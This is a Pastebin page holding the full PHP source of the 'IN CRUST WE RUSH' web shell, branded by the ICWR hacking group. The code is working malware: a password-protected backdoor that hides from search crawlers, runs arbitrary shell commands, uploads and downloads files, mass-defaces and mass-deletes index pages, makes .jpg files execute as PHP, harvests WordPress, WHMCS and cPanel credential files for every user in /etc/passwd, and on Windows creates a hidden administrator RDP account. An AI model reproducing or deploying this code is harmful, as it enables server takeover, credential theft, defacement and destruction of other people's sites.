API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 8th, 2018
242
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 25.40 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "c27821fc7950c95f8725c6d2ba07c085";
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <!DOCTYPE HTML>
  29. <html>
  30. <head>
  31. <title>IN CRUST WE RUSH</title>
  32. <style type="text/css">
  33. html {
  34.     margin: 20px auto;
  35.     background: #000000;
  36.     color: green;
  37.     text-align: center;
  38. }
  39. header {
  40.     color: aqua;
  41.     margin: 10px auto;
  42. }
  43. input[type=password] {
  44.     width: 250px;
  45.     height: 25px;
  46.     color: red;
  47.     background: transparent;
  48.     border: 1px dotted green;
  49.     margin-left: 20px;
  50.     text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center><font color="green" size="20">IN CRUST WE RUSH</font></center>
  55. <center>
  56. <a href="http://icwr-server.hol.es"><img alt="Hacked By ICWR Family" src="https://preview.ibb.co/hbMR46/Whats_App_Image_2018_01_07_at_15_07_37_burned.png" height="200" width="200" /></a>
  57. </center>
  58. <center>
  59. <font color="white" size="20">INDONESIAN </font><font color="red" size="20">BAD HAT</font>
  60. </center>
  61. <center>
  62. <header>
  63.     <pre>
  64.  _____________________________________
  65. < root@in-crust-we-rush:~# NoiseCrusT >
  66.  -------------------------------------
  67.     </pre>
  68. </header>
  69. <form method="post">
  70. <input type="password" name="pass">
  71. </form>
  72. </center>
  73. <?php
  74. exit;
  75. }
  76. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  77.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  78.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  79.     else
  80.         login_shell();
  81. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  82.     @ob_clean();
  83.     $file = $_GET['file'];
  84.     header('Content-Description: File Transfer');
  85.     header('Content-Type: application/octet-stream');
  86.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  87.     header('Expires: 0');
  88.     header('Cache-Control: must-revalidate');
  89.     header('Pragma: public');
  90.     header('Content-Length: ' . filesize($file));
  91.     readfile($file);
  92.     exit;
  93. }
  94. ?>
  95. <head>
  96. <head>
  97. <title>IN CRUST WE RUSH</title>
  98. <meta name='author' content='NoiseCrusT'>
  99. <meta charset="UTF-8">
  100. <style type="text/css">
  101.  
  102. body {
  103. background: url(https://preview.ibb.co/eM5kMw/Black_Background_HD_Wallpaper_25.jpg) no-repeat fixed;
  104.    -webkit-background-size: 100% 100%;
  105.    -moz-background-size: 100% 100%;
  106.    -o-background-size: 100% 100%;
  107.    background-size: 100% 100%;
  108. }
  109.  
  110. </style>
  111. </head>
  112. <hr>
  113. <center><font color="green" size="20">IN CRUST WE RUSH</font></center>
  114. <center><a href="http://icwr-server.hol.es"><img alt="Hacked By ICWR Family" src="https://preview.ibb.co/hbMR46/Whats_App_Image_2018_01_07_at_15_07_37_burned.png" height="100" width="100" /></a></center>
  115. <center><font color="white" size="20">INDONESIAN </font><font color="red" size="20">BAD HAT</font></center>
  116. <hr>
  117. <?php
  118. function w($dir,$perm) {
  119.     if(!is_writable($dir)) {
  120.         return "<font color=red>".$perm."</font>";
  121.     } else {
  122.         return "<font color=green>".$perm."</font>";
  123.     }
  124. }
  125. function r($dir,$perm) {
  126.     if(!is_readable($dir)) {
  127.         return "<font color=red>".$perm."</font>";
  128.     } else {
  129.         return "<font color=green>".$perm."</font>";
  130.     }
  131. }
  132. function exe($cmd) {
  133.     if(function_exists('system')) {        
  134.         @ob_start();       
  135.         @system($cmd);     
  136.         $buff = @ob_get_contents();        
  137.         @ob_end_clean();       
  138.         return $buff;  
  139.     } elseif(function_exists('exec')) {        
  140.         @exec($cmd,$results);      
  141.         $buff = "";        
  142.         foreach($results as $result) {         
  143.             $buff .= $result;      
  144.         } return $buff;    
  145.     } elseif(function_exists('passthru')) {        
  146.         @ob_start();       
  147.         @passthru($cmd);       
  148.         $buff = @ob_get_contents();        
  149.         @ob_end_clean();       
  150.         return $buff;  
  151.     } elseif(function_exists('shell_exec')) {      
  152.         $buff = @shell_exec($cmd);     
  153.         return $buff;  
  154.     }
  155. }
  156. function perms($file){
  157.     $perms = fileperms($file);
  158.     if (($perms & 0xC000) == 0xC000) {
  159.     // Socket
  160.     $info = 's';
  161.     } elseif (($perms & 0xA000) == 0xA000) {
  162.     // Symbolic Link
  163.     $info = 'l';
  164.     } elseif (($perms & 0x8000) == 0x8000) {
  165.     // Regular
  166.     $info = '-';
  167.     } elseif (($perms & 0x6000) == 0x6000) {
  168.     // Block special
  169.     $info = 'b';
  170.     } elseif (($perms & 0x4000) == 0x4000) {
  171.     // Directory
  172.     $info = 'd';
  173.     } elseif (($perms & 0x2000) == 0x2000) {
  174.     // Character special
  175.     $info = 'c';
  176.     } elseif (($perms & 0x1000) == 0x1000) {
  177.     // FIFO pipe
  178.     $info = 'p';
  179.     } else {
  180.     // Unknown
  181.     $info = 'u';
  182.     }
  183.         // Owner
  184.     $info .= (($perms & 0x0100) ? 'r' : '-');
  185.     $info .= (($perms & 0x0080) ? 'w' : '-');
  186.     $info .= (($perms & 0x0040) ?
  187.     (($perms & 0x0800) ? 's' : 'x' ) :
  188.     (($perms & 0x0800) ? 'S' : '-'));
  189.     // Group
  190.     $info .= (($perms & 0x0020) ? 'r' : '-');
  191.     $info .= (($perms & 0x0010) ? 'w' : '-');
  192.     $info .= (($perms & 0x0008) ?
  193.     (($perms & 0x0400) ? 's' : 'x' ) :
  194.     (($perms & 0x0400) ? 'S' : '-'));
  195.     // World
  196.     $info .= (($perms & 0x0004) ? 'r' : '-');
  197.     $info .= (($perms & 0x0002) ? 'w' : '-');
  198.     $info .= (($perms & 0x0001) ?
  199.     (($perms & 0x0200) ? 't' : 'x' ) :
  200.     (($perms & 0x0200) ? 'T' : '-'));
  201.     return $info;
  202. }
  203. function hdd($s) {
  204.     if($s >= 1073741824)
  205.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  206.     elseif($s >= 1048576)
  207.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  208.     elseif($s >= 1024)
  209.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  210.     else
  211.     return $s .' B';
  212. }
  213. function ambilKata($param, $kata1, $kata2){
  214.     if(strpos($param, $kata1) === FALSE) return FALSE;
  215.     if(strpos($param, $kata2) === FALSE) return FALSE;
  216.     $start = strpos($param, $kata1) + strlen($kata1);
  217.     $end = strpos($param, $kata2, $start);
  218.     $return = substr($param, $start, $end - $start);
  219.     return $return;
  220. }
  221. function getsource($url) {
  222.     $curl = curl_init($url);
  223.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  224.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  225.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  226.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  227.     $content = curl_exec($curl);
  228.             curl_close($curl);
  229.     return $content;
  230. }
  231. function bing($dork) {
  232.     $npage = 1;
  233.     $npages = 30000;
  234.     $allLinks = array();
  235.     $lll = array();
  236.     while($npage <= $npages) {
  237.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  238.         if($x) {
  239.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  240.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  241.             $npage = $npage + 10;
  242.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  243.         } else break;
  244.     }
  245.     $URLs = array();
  246.     foreach($allLinks as $url){
  247.         $exp = explode("/", $url);
  248.         $URLs[] = $exp[2];
  249.     }
  250.     $array = array_filter($URLs);
  251.     $array = array_unique($array);
  252.     $sss = count(array_unique($array));
  253.     foreach($array as $domain) {
  254.         echo $domain."\n";
  255.     }
  256. }
  257. function reverse($url) {
  258.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  259.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  260.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  261.           curl_setopt($ch, CURLOPT_HEADER, 0);
  262.           curl_setopt($ch, CURLOPT_POST, 1);
  263.     $resp = curl_exec($ch);
  264.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  265.     $array = explode(",,", $resp);
  266.     unset($array[0]);
  267.     foreach($array as $lnk) {
  268.         $lnk = "http://$lnk";
  269.         $lnk = str_replace(",", "", $lnk);
  270.         echo $lnk."\n";
  271.         ob_flush();
  272.         flush();
  273.     }
  274.         curl_close($ch);
  275. }
  276. if(get_magic_quotes_gpc()) {
  277.     function idx_ss($array) {
  278.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  279.     }
  280.     $_POST = idx_ss($_POST);
  281.     $_COOKIE = idx_ss($_COOKIE);
  282. }
  283.  
  284. if(isset($_GET['dir'])) {
  285.     $dir = $_GET['dir'];
  286.     chdir($dir);
  287. } else {
  288.     $dir = getcwd();
  289. }
  290. $kernel = php_uname();
  291. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  292. $dir = str_replace("\\","/",$dir);
  293. $scdir = explode("/", $dir);
  294. $freespace = hdd(disk_free_space("/"));
  295. $total = hdd(disk_total_space("/"));
  296. $used = $total - $freespace;
  297. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
  298. $ds = @ini_get("disable_functions");
  299. $mysql = (function_exists('mysql_connect')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  300. $curl = (function_exists('curl_version')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  301. $wget = (exe('wget --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  302. $perl = (exe('perl --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  303. $python = (exe('python --help')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  304. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=green>NONE</font>";
  305. if(!function_exists('posix_getegid')) {
  306.     $user = @get_current_user();
  307.     $uid = @getmyuid();
  308.     $gid = @getmygid();
  309.     $group = "?";
  310. } else {
  311.     $uid = @posix_getpwuid(posix_geteuid());
  312.     $gid = @posix_getgrgid(posix_getegid());
  313.     $user = $uid['name'];
  314.     $uid = $uid['uid'];
  315.     $group = $gid['name'];
  316.     $gid = $gid['gid'];
  317. }
  318. echo "<center><font color='aqua'>System: </font><font color=green>".$kernel."</font><br>";
  319. echo "<font color='aqua'>User: </font><font color=green>".$user."</font><font color='aqua'> (".$uid.") Group: </font><font color=green>".$group."</font><font color='aqua'> (".$gid.")</font><br>";
  320. echo "<font color='aqua'>Server IP: </font><font color=red>".$ip."</font><font color='aqua'> | Your IP: </font><font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  321. echo "<font color='aqua'>HDD: </font><font color=green>$used</font><font color='aqua'> / </font><font color=green>$total</font> <font color='aqua'>( Free: </font><font color=green>$freespace</font><font color='aqua'> )</font><br>";
  322. echo "<font color='aqua'>Safe Mode: </font>$sm<br>";
  323. echo "<font color='aqua'>Disable Functions: </font>$show_ds<br>";
  324. echo "<font color='aqua'>MySQL: </font>$mysql <font color='aqua'>| Perl: </font>$perl <font color='aqua'>| Python: </font>$python <font color='aqua'>| WGET: </font>$wget <font color='aqua'>| CURL: </font>$curl <br>";
  325. echo "<font color='aqua'>Current DIR: </font><font color=green>";
  326. foreach($scdir as $c_dir => $cdir) {   
  327.     echo "<a href='?dir=";
  328.     for($i = 0; $i <= $c_dir; $i++) {
  329.         echo $scdir[$i];
  330.         if($i != $c_dir) {
  331.         echo "/";
  332.         }
  333.     }
  334.     echo "'>$cdir</a>/";
  335. }
  336. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]</font></center>";
  337. echo "<hr>";
  338. echo "<center>";
  339. echo "[ <a href='?'><font color='green'>Home</font></a> ]";
  340. echo "[ <a href='?dir=$dir&do=cmd'><font color='green'>Command Shell</font></a> ]";
  341. echo "[ <a href='?dir=$dir&do=mass_deface'><font color='green'>Mass Deface</font></a> ]";
  342. echo "[ <a href='?dir=$dir&do=mass_delete'><font color='green'>Mass Delete</font></a> ]";
  343. echo "[ <a href='?dir=$dir&do=csrf_online'><font color='green'>CSRF Online</font></a> ]";
  344. echo "[ <a href='?dir=$dir&do=by_pass'><font color='green'>Bypass Extensi</font></a> ]";
  345. echo "[ <a href='?dir=$dir&do=krdp_shell'><font color='green'>K-RDP Shell</font></a> ]";
  346. echo "[ <a style='color: red;' href='?logout=true'>Keluar</a> ]";
  347. echo "<hr>";
  348. if($_GET['logout'] == true) {
  349.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  350.     echo "<script>window.location='?';</script>";
  351. } elseif($_GET['do'] == 'csrf_online'){
  352.     echo "<form method='post'>
  353. <font color='green'>URL: </font><input type='text' name='url' size='50' height='10' placeholder='http://www.target.com/[path]/upload.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  354. <font color='green'>POST File: </font><input type='text' name='pf' size='50' height='10' placeholder='Filedata / files[] / qqfile / userfile / dll' style='margin: 5px auto; padding-left: 5px;' required><br>
  355. <input type='submit' name='d' value='Kunci Target!!!'>
  356. </form>";
  357.  
  358. $url = $_POST['url'];
  359. $pf = $_POST['pf'];
  360. $d = $_POST['d'];
  361. if($d) {
  362.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Crotttzz Cok!'></form";
  363. }
  364.  
  365. } elseif($_GET['do'] == 'cmd') {
  366.     echo "<form method='post'>
  367.     <font style='text-decoration: underline;' color='green'>".$user."@".$ip.": ~ $ </font>
  368.     <input type='text' size='30' height='10' color='green' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  369.     </form>";
  370.     if($_POST['do_cmd']) {
  371.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  372.     }
  373. } elseif ($_GET['do']=='by_pass') {
  374.     $isi="\n Addhandler application/x-httpd-php .jpg";
  375.  
  376.     $fp=fopen('.htaccess','a+');
  377.     if(fwrite($fp,$isi)){
  378.         if(rename($_SERVER['SCRIPT_FILENAME'],"icwr.jpg")){
  379.             echo"
  380.             <script>
  381.             alert('Udah Cookk Jancokkk !!');
  382.             window.location.href='icwr.jpg'
  383.             </script>";
  384.         }
  385.     }
  386.     fclose($fp);
  387. } elseif($_GET['do'] == 'mass_deface') {
  388.     function sabun_massal($dir,$namafile,$isi_script) {
  389.         if(is_writable($dir)) {
  390.             $dira = scandir($dir);
  391.             foreach($dira as $dirb) {
  392.                 $dirc = "$dir/$dirb";
  393.                 $lokasi = $dirc.'/'.$namafile;
  394.                 if($dirb === '.') {
  395.                     file_put_contents($lokasi, $isi_script);
  396.                 } elseif($dirb === '..') {
  397.                     file_put_contents($lokasi, $isi_script);
  398.                 } else {
  399.                     if(is_dir($dirc)) {
  400.                         if(is_writable($dirc)) {
  401.                             echo "[<font color=green>DONE</font>] $lokasi<br>";
  402.                             file_put_contents($lokasi, $isi_script);
  403.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  404.                         }
  405.                     }
  406.                 }
  407.             }
  408.         }
  409.     }
  410.     function sabun_biasa($dir,$namafile,$isi_script) {
  411.         if(is_writable($dir)) {
  412.             $dira = scandir($dir);
  413.             foreach($dira as $dirb) {
  414.                 $dirc = "$dir/$dirb";
  415.                 $lokasi = $dirc.'/'.$namafile;
  416.                 if($dirb === '.') {
  417.                     file_put_contents($lokasi, $isi_script);
  418.                 } elseif($dirb === '..') {
  419.                     file_put_contents($lokasi, $isi_script);
  420.                 } else {
  421.                     if(is_dir($dirc)) {
  422.                         if(is_writable($dirc)) {
  423.                             echo "[<font color=green>DONE</font>] $dirb/$namafile<br>";
  424.                             file_put_contents($lokasi, $isi_script);
  425.                         }
  426.                     }
  427.                 }
  428.             }
  429.         }
  430.     }
  431.     if($_POST['start']) {
  432.         if($_POST['tipe_sabun'] == 'mahal') {
  433.             echo "<div style='margin: 5px auto; padding: 5px'>";
  434.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  435.             echo "</div>";
  436.         } elseif($_POST['tipe_sabun'] == 'murah') {
  437.             echo "<div style='margin: 5px auto; padding: 5px'>";
  438.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  439.             echo "</div>";
  440.         }
  441.     } else {
  442.     echo "<center>";
  443.     echo "<form method='post'>
  444.     <font style='text-decoration: underline;' color='green'>Tipe Deface :</font><br>
  445.     <input type='radio' name='tipe_sabun' value='murah' checked><font color='white'>Biasa :v</font><input type='radio' name='tipe_sabun' value='mahal'><font color='red'>CRUST CORE !!!</font><br>
  446.     <font style='text-decoration: underline;' color='green'>Folder:</font><br>
  447.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  448.     <font style='text-decoration: underline;' color='green'>Filename:</font><br>
  449.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  450.     <font style='text-decoration: underline;' color='green'>Index File:</font><br>
  451.     <textarea name='script' style='width: 450px; height: 200px;'>IN CRUST WE RUSH</textarea><br>
  452.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  453.     </form></center>";
  454.     }
  455. } elseif($_GET['do'] == 'mass_delete') {
  456.     function hapus_massal($dir,$namafile) {
  457.         if(is_writable($dir)) {
  458.             $dira = scandir($dir);
  459.             foreach($dira as $dirb) {
  460.                 $dirc = "$dir/$dirb";
  461.                 $lokasi = $dirc.'/'.$namafile;
  462.                 if($dirb === '.') {
  463.                     if(file_exists("$dir/$namafile")) {
  464.                         unlink("$dir/$namafile");
  465.                     }
  466.                 } elseif($dirb === '..') {
  467.                     if(file_exists("".dirname($dir)."/$namafile")) {
  468.                         unlink("".dirname($dir)."/$namafile");
  469.                     }
  470.                 } else {
  471.                     if(is_dir($dirc)) {
  472.                         if(is_writable($dirc)) {
  473.                             if(file_exists($lokasi)) {
  474.                                 echo "[<font color=green>DELETED</font>] $lokasi<br>";
  475.                                 unlink($lokasi);
  476.                                 $idx = hapus_massal($dirc,$namafile);
  477.                             }
  478.                         }
  479.                     }
  480.                 }
  481.             }
  482.         }
  483.     }
  484.     if($_POST['start']) {
  485.         echo "<div style='margin: 5px auto; padding: 5px'>";
  486.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
  487.         echo "</div>";
  488.     } else {
  489.     echo "<center>";
  490.     echo "<form method='post'>
  491.     <font style='text-decoration: underline;' color='green'>Folder:</font><br>
  492.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  493.     <font style='text-decoration: underline;' color='green'>Filename:</font><br>
  494.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  495.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  496.     </form></center>";
  497.     }
  498. } elseif($_GET['do'] == 'config') {
  499.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  500.     $idx = mkdir("idx_config", 0777);
  501.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  502.     $htc = fopen("idx_config/.htaccess","w");
  503.     fwrite($htc, $isi_htc);
  504.     while($passwd = fgets($etc)) {
  505.         if($passwd == "" || !$etc) {
  506.             echo "<font color=red>Can't read /etc/passwd</font>";
  507.         } else {
  508.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  509.             foreach($user_config[1] as $user_idx) {
  510.                 $user_config_dir = "/home/$user_idx/public_html/";
  511.                 if(is_readable($user_config_dir)) {
  512.                     $grab_config = array(
  513.                         "/home/$user_idx/.my.cnf" => "cpanel",
  514.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
  515.                         "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  516.                         "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  517.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  518.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  519.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  520.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  521.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  522.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  523.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  524.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  525.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  526.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  527.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  528.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
  529.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  530.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  531.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  532.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  533.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  534.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  535.                     foreach($grab_config as $config => $nama_config) {
  536.                         $ambil_config = file_get_contents($config);
  537.                         if($ambil_config == '') {
  538.                         } else {
  539.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  540.                             fputs($file_config,$ambil_config);
  541.                         }
  542.                     }
  543.                 }      
  544.             }
  545.         }  
  546.     }
  547.     echo "<center><a href='?dir=$dir/idx_config'><font color=green>Done</font></a></center>";
  548. } elseif($_GET['do'] == 'krdp_shell') {
  549.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  550.         if($_POST['create']) {
  551.             $user = htmlspecialchars($_POST['user']);
  552.             $pass = htmlspecialchars($_POST['pass']);
  553.             if(preg_match("/$user/", exe("net user"))) {
  554.                 echo "[INFO] -> <font color=red>user <font color=green>$user</font> sudah ada</font>";
  555.             } else {
  556.                 $add_user   = exe("net user $user $pass /add");
  557.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  558.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  559.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  560.                 echo "[ RDP ACCOUNT INFO ]<br>
  561.                 ------------------------------<br>
  562.                 IP: <font color=green>".$ip."</font><br>
  563.                 Username: <font color=green>$user</font><br>
  564.                 Password: <font color=green>$pass</font><br>
  565.                 ------------------------------<br><br>
  566.                 [ STATUS ]<br>
  567.                 ------------------------------<br>
  568.                 ";
  569.                 if($add_user) {
  570.                     echo "[add user] -> <font color='green'>Berhasil</font><br>";
  571.                 } else {
  572.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  573.                 }
  574.                 if($add_groups1) {
  575.                     echo "[add localgroup Administrators] -> <font color='green'>Berhasil</font><br>";
  576.                 } elseif($add_groups2) {
  577.                     echo "[add localgroup Administrator] -> <font color='green'>Berhasil</font><br>";
  578.                 } elseif($add_groups3) {
  579.                     echo "[add localgroup Administrateur] -> <font color='green'>Berhasil</font><br>";
  580.                 } else {
  581.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  582.                 }
  583.                 echo "------------------------------<br>";
  584.             }
  585.         } elseif($_POST['s_opsi']) {
  586.             $user = htmlspecialchars($_POST['r_user']);
  587.             if($_POST['opsi'] == '1') {
  588.                 $cek = exe("net user $user");
  589.                 echo "Checking username <font color=green>$user</font> ....... ";
  590.                 if(preg_match("/$user/", $cek)) {
  591.                     echo "[ <font color=green>Sudah ada</font> ]<br>
  592.                     ------------------------------<br><br>
  593.                     <pre>$cek</pre>";
  594.                 } else {
  595.                     echo "[ <font color=red>belum ada</font> ]";
  596.                 }
  597.             } elseif($_POST['opsi'] == '2') {
  598.                 $cek = exe("net user $user incrustwerush");
  599.                 if(preg_match("/$user/", exe("net user"))) {
  600.                     echo "[change password: <font color=green>incrustwerush</font>] -> ";
  601.                     if($cek) {
  602.                         echo "<font color=green>Berhasil</font>";
  603.                     } else {
  604.                         echo "<font color=red>Gagal</font>";
  605.                     }
  606.                 } else {
  607.                     echo "[INFO] -> <font color=red>user <font color=green>$user</font> belum ada</font>";
  608.                 }
  609.             } elseif($_POST['opsi'] == '3') {
  610.                 $cek = exe("net user $user /DELETE");
  611.                 if(preg_match("/$user/", exe("net user"))) {
  612.                     echo "[remove user: <font color=green>$user</font>] -> ";
  613.                     if($cek) {
  614.                         echo "<font color=green>Berhasil</font>";
  615.                     } else {
  616.                         echo "<font color=red>Gagal</font>";
  617.                     }
  618.                 } else {
  619.                     echo "[INFO] -> <font color=red>user <font color=green>$user</font> belum ada</font>";
  620.                 }
  621.             } else {
  622.                 //
  623.             }
  624.         } else {
  625.             echo "-- Create RDP --<br>
  626.             <form method='post'>
  627.             <input type='text' name='user' placeholder='username' value='incrustwerush' required>
  628.             <input type='text' name='pass' placeholder='password' value='incrustwerush' required>
  629.             <input type='submit' name='create' value='>>'>
  630.             </form>
  631.             -- Option --<br>
  632.             <form method='post'>
  633.             <input type='text' name='r_user' placeholder='username' required>
  634.             <select name='opsi'>
  635.             <option value='1'>Cek Username</option>
  636.             <option value='2'>Ubah Password</option>
  637.             <option value='3'>Hapus Username</option>
  638.             </select>
  639.             <input type='submit' name='s_opsi' value='>>'>
  640.             </form>
  641.             ";
  642.         }
  643.     } else {
  644.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  645.     }
  646. }
  647.  
  648. echo "<center>";
  649. echo "<p>";
  650.  
  651. if(isset($_FILES['file'])){
  652. if(copy($_FILES['file']['tmp_name'],$dir.'/'.$_FILES['file']['name'])){
  653. echo '<font color="green">Upload Success Cookkk !!!</font><br />';
  654. }else{
  655. echo '<font color="red">Upload Failed !!!</font><br/>';
  656. }
  657. }
  658. echo '<form enctype="multipart/form-data" method="POST">
  659. <font color="white">File Upload :</font> <input type="file" name="file" />
  660. <input type="submit" value="upload" />
  661. </form>';
  662. $_SERVER['PHP_SELF'];
  663. $myDirectory = opendir("$dir");
  664. while($entryName = readdir($myDirectory)) {
  665.     $dirArray[] = $entryName;
  666. }
  667. closedir($myDirectory);
  668. $indexCount = count($dirArray);
  669. Print ("<hr>
  670. <font color='white'>Directory Ini Berisi : </font><font color='red'>$indexCount File / Directory</font><br>\n");
  671. sort($dirArray);
  672. print("<hr>
  673. <TABLE border=1 cellpadding=5 cellspacing=0 class=whitelinks>\n");
  674. print("<TR><TH><font color='white'>Nama File</font></TH><th><font color='white'>Type File</font></th><th><font color='white'>Ukuran File</font></th><th><font color='white'>Permission</font></th></TR>\n");
  675. for($index=0; $index < $indexCount; $index++) {
  676.         if (substr("$dirArray[$index]", 0, 1) != "$path"){
  677.         print("<TR><TD><font color='white'><a href=\"?dir=$dir/$dirArray[$index]\">$dirArray[$index]</a></font></td>");
  678.         print("<td><font color='white'>");  print(filetype($dirArray[$index])); print("</font></td>");
  679.         print("<td><font color='white'>");  print(filesize($dirArray[$index])); print("</font></td>");
  680.         print("<td><font color='white'>");  print(perms("$dir/$file[$index]")); print("</font></td>");
  681.         print("</TR>\n");
  682.     }
  683. }
  684. print("</TABLE>\n");
  685.  
  686.  
  687.  
  688. echo "</p>";
  689. echo "<hr>";
  690. echo "<p><font color=\"aqua\">Powered By </font><a href=\"https://incrustwerush.wordpress.com/\"><font color=\"green\">ICWR Family</font></a></p>";
  691. echo "</center>";
  692. echo "<hr>";
  693. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!